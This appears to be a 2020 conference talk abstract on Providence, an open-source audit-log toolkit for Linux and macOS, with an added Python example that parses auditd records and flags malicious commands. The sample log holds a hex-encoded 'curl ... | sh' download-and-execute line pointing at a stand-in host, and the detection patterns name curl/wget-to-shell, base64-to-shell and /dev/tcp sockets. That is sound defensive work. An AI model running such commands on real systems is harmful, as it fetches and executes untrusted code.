- Goa 2020
Swapnil Kumbhar & Akshay Shah
Incident response and analysis today rely on a single source of truth: logs. But on Linux/BSD systems and macOS endpoints, configuring and collecting audit logs is not as straightforward as it is on Windows. To solve this problem we created Providence, a stack of open-source tools authored by us that aims to simplify auditing on these systems. In this presentation we will explain how kernel-level auditing works on Linux and macOS by walking through the Linux Audit subsystem and the macOS Endpoint Security framework. After covering the userland executables for these frameworks, we will demonstrate how Providence simplifies their use across platforms and unifies the data in a single dashboard. That dashboard is then used to analyse the data and detect known malicious scripts and malware on the systems.
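To make the Linux side of the talk concrete, here is an added example (written for this page, not Providence's own code) of the parsing step any dashboard on top of auditd has to get right. It assumes an execve rule such as `-a always,exit -F arch=b64 -S execve -k exec` is loaded, so every process launch produces a SYSCALL record and an EXECVE record that share one event serial. The sample log lines are constructed, not captured. The point the example demonstrates is that auditd hex-encodes any argument containing a space, quote or control character, so a `bash -c "curl ... | sh"` launch is invisible to a plain grep of audit.log until the EXECVE arguments are decoded and the records are joined by serial; the signature list is a placeholder for whatever known-malicious patterns a dashboard ships with.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/audit/audit.log (not real data): one benign
# `ls -l` and one `bash -c "curl http://x.example/a.sh | sh"`. auditd emits a
# value containing whitespace or quotes as *unquoted uppercase hex*, which is
# why a2 of event 4242 is unreadable on disk. Plain values are always quoted,
# so "quoted or hex" is an unambiguous rule for EXECVE arguments.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1580000000.101:4241): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1301 auid=1000 uid=1000 gid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1580000000.101:4241): argc=2 a0="ls" a1="-l"
type=SYSCALL msg=audit(1580000000.102:4242): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1302 auid=1000 uid=1000 gid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1580000000.102:4242): argc=3 a0="bash" a1="-c" a2=6375726C20687474703A2F2F782E6578616D706C652F612E7368207C207368
"""

# type=<RECORD> msg=audit(<epoch.ms>:<serial>): <key=value ...>
RECORD_RE = re.compile(
    r'^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$'
)
# key=value pairs; a value is either a double-quoted string or a bare token
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Placeholder signatures for "known malicious script" behaviour; a real
# deployment would load these from its own rule set.
SIGNATURES = [
    ("download-and-execute", re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b')),
    ("base64-decode-to-shell", re.compile(r'base64\s+(-d|--decode).*\|\s*(ba)?sh\b')),
    ("bash-dev-tcp-socket", re.compile(r'/dev/tcp/')),
]


def decode_execve_arg(raw):
    """Return the text of an EXECVE aN field: strip quotes, or hex-decode."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    # Only EXECVE argument fields are decoded this way; numeric SYSCALL
    # fields like pid=1301 would otherwise look like valid hex.
    if len(raw) % 2 == 0 and re.fullmatch(r'[0-9A-F]+', raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw


def parse_events(text):
    """Group SYSCALL and EXECVE records by audit serial into one event each."""
    events = defaultdict(dict)
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        fields = dict(FIELD_RE.findall(m.group("body")))
        ev = events[m.group("serial")]
        ev["ts"] = float(m.group("ts"))
        if m.group("type") == "SYSCALL":
            ev["syscall"] = {k: v.strip('"') for k, v in fields.items()}
        elif m.group("type") == "EXECVE":
            argc = int(fields["argc"])
            ev["argv"] = [decode_execve_arg(fields[f"a{i}"]) for i in range(argc)]
    return dict(events)


def detect(events):
    """Run the signatures over each reconstructed command line."""
    alerts = []
    for serial, ev in sorted(events.items()):
        argv = ev.get("argv")
        if not argv:
            continue
        cmdline = " ".join(argv)
        sc = ev.get("syscall", {})
        for rule, pattern in SIGNATURES:
            if pattern.search(cmdline):
                alerts.append({
                    "serial": serial, "rule": rule, "pid": sc.get("pid"),
                    "auid": sc.get("auid"), "exe": sc.get("exe"), "cmdline": cmdline,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_AUDIT_LOG)):
        print(alert)
```

Two caveats a practitioner hits immediately when doing this for real: very long arguments are split by the kernel into `a2[0]`, `a2[1]`, ... chunks that must be concatenated before decoding, and `ausearch -i` performs the same hex decoding shown here, which is the quickest way to check that a parser agrees with the kernel's encoding.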
Swapnil is a red teamer at Smokescreen Technologies whose interests lie in EDR defence evasion, Active Directory and PowerShell. In his free time he likes to dabble with code. He has experience breaking into the most secure infrastructures in the nation.
Akshay Shah is a computer engineer working in cybersecurity. He is one of the authors of an IEEE research paper on lightweight authentication and encryption mechanisms in RPL. He loves simple automation, tries to write code on weekdays and likes to do research on weekends.